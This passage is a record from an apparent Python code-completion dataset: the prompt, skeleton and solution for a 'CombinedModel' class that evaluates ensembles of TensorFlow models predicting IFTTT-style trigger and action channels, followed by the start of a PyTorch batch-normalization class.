logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\nerror = np.mean(mistakes)\nlogging.info('Combined Error = %s', error)", "assert len(args.experiment_name) == len(args.saved_model_path)\nconfig = configs.PaperConfiguration\nCombinedModel._log_configurations(config)\nnum_models = len(args.experiment_name)\nmodels = []\nfor i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\nensemble = EnsembledModel()\nfor model in models:\n ensemble.add_model(model)\nreturn ensemble", "logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\nlogging.info('Log Level: %s', args.log_level)\nlogging.info('Experiment Name: %s', args.experiment_name)\nlogging.info('Model: %s', args.model[0])\nlogging.info('Saved Model Path: %s', args.saved_model_path)\nlogging.info('Use Full Test Set: %s', args.use_full_test_set)\nlogging.info('Use English Subset: %s', args.use_english)\nlogging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\nlogging.info('Use Gold Subset: %s', args.use_gold)\nlogging.info('Use Names and Descriptions: %s', args.use_names_descriptions)", "logging.info('Using the following configurations:')\nlogging.info('hidden_size (d) = %s', config.hidden_size)\nlogging.info('vocab_size (N) = %s', config.vocab_size)\nlogging.info('sent_size (j) = %s', config.sent_size)"], "bodies_text": "<|body_start_0|>\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n<|end_body_0|>\n\n<|body_start_1|>\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n<|end_body_2|>\n\n<|body_start_3|>\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n<|end_body_3|>\n\n<|body_start_4|>\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n<|end_body_4|>\n", "class_docstring": "Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo", "class_name": "CombinedModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n <|body_0|>\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n <|body_1|>\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n <|body_2|>\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n <|body_3|>\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n<|end_body_0|>\n\n<|body_start_1|>\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n<|end_body_2|>\n\n<|body_start_3|>\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n<|end_body_3|>\n\n<|body_start_4|>\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000480", "length_bytes": 33655, "license_type": "no_license", "methods": [{"docstring": "Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:", "name": "__init__", "signature": "def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True)"}, {"docstring": "Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.", "name": "test_models", "signature": "def test_models(self)"}, {"docstring": "Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.", "name": "create_ensemble", "signature": "def create_ensemble(args, model_class)"}, {"docstring": "Logs command-line arguments.", "name": "_log_args", "signature": "def _log_args(self, args)"}, {"docstring": "Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.", "name": "_log_configurations", "signature": "def _log_configurations(config)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_005752", "prompt": "Implement the Python class `CombinedModel` described below.\n\nClass description:\nModel class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\n\nMethod signatures and docstrings:\n- def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True): Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\n- def test_models(self): Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\n- def create_ensemble(args, model_class): Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\n- def _log_args(self, args): Logs command-line arguments.\n- def _log_configurations(config): Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.", "prompted_full_text": "Implement the Python class `CombinedModel` described below.\n\nClass description:\nModel class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\n\nMethod signatures and docstrings:\n- def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True): Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\n- def test_models(self): Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\n- def create_ensemble(args, model_class): Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\n- def _log_args(self, args): Logs command-line arguments.\n- def _log_configurations(config): Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\n\n<|skeleton|>\nclass CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n <|body_0|>\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n <|body_1|>\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n <|body_2|>\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n <|body_3|>\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n<|end_body_0|>\n\n<|body_start_1|>\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n<|end_body_2|>\n\n<|body_start_3|>\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n<|end_body_3|>\n\n<|body_start_4|>\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n<|end_body_4|>\n", "revision_id": "578323676c040f881d79e6dfae96522639fdb753", "skeleton": "<|skeleton|>\nclass CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n <|body_0|>\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n <|body_1|>\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n <|body_2|>\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n <|body_3|>\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "parser/combined_model.py", "source_repo": "shobhit6993/natural-language-to-code", "split": "test", "star_events_count": 1} {"blob_id": "d57f5ee4d6f892265e44cc204116135cc1ff7e94", "bodies": ["super(FieldBatchNormalization, self).__init__()\nself.bn = nn.BatchNorm1d(in_channel)\nself.in_channel = in_channel", "points = in_feature[:, :, :3]\nfeature = in_feature[:, :, 3:]\nfeature = feature.permute(0, 2, 1)\nassert len(points.shape) == 3, 'The input point cloud should be batched!'\nassert len(feature.shape) == 3, 'The input signed distance field should be batched!'\nassert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\nbn_feature = self.bn(feature)\nbn_feature = bn_feature.permute(0, 2, 1)\nout_feature = torch.cat([points, bn_feature], -1)\nreturn out_feature"], "bodies_text": "<|body_start_0|>\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n<|end_body_0|>\n\n<|body_start_1|>\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n<|end_body_1|>\n", "class_docstring": "Field convolution layer.", "class_name": "FieldBatchNormalization", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FieldBatchNormalization:\n 